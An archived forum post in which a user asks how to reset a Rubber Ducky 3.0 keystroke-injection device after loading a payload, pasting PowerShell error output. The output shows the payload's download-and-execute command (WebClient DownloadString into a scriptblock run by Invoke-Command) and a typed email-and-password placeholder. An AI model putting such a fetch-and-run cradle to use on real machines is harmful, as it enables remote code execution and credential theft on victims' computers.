How to fix a rubber ducky

Victor0h

Hey guys I just got the new rubber ducky 3.0 as always I was impatient and did not follow the set up properly, after I inserted a payload  and plugged it in I have'nt been able to get back to the main usb portion to add more payloads, I hit the reset button after opening the ducky up and still get the same results. The video for the payload I instead was this one:

My message in powershell looks like the following:

Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Try the new cross-platform PowerShell https://aka.ms/pscore6

PS C:\Users\Vick> $script = [scriptblock]::Create((New-Object Net.WebClient).DownloadString('LINK HERE'));
Exception calling "DownloadString" with "1" argument(s): "Could not find file 'C:\Users\Vick\LINK HERE'."
At line:1 char:1
+ $script = [scriptblock]::Create((New-Object Net.WebClient).DownloadSt ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
    + FullyQualifiedErrorId : WebException

PS C:\Users\Vick> Invoke-Command -ScriptBlock $script
Invoke-Command : Cannot validate argument on parameter 'ScriptBlock'. The argument is null. Provide a valid value for the argument, and then try running the
command again.
At line:1 char:29
+ Invoke-Command -ScriptBlock $script
+                             ~~~~~~~
    + CategoryInfo          : InvalidData: (:) [Invoke-Command], ParameterBindingValidationException
    + FullyQualifiedErrorId : ParameterArgumentValidationError,Microsoft.PowerShell.Commands.InvokeCommandCommand

PS C:\Users\Vick> xxx@gmail.comPASSWORD
Xxx@gmail.comPASSWORD : The term 'xxx@gmail.comPASSWORD' is not recognized as the name of a cmdlet, function, script file, or
operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.
At line:1 char:1
+ Xxxx@gmail.comPASSWORD
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : ObjectNotFound: (xxxx@gmail.comPASSWORD:String) [], CommandNotFoundException
    + FullyQualifiedErrorId : CommandNotFoundException

Please let me know any helpful suggestions if you can, thanks again.

Archived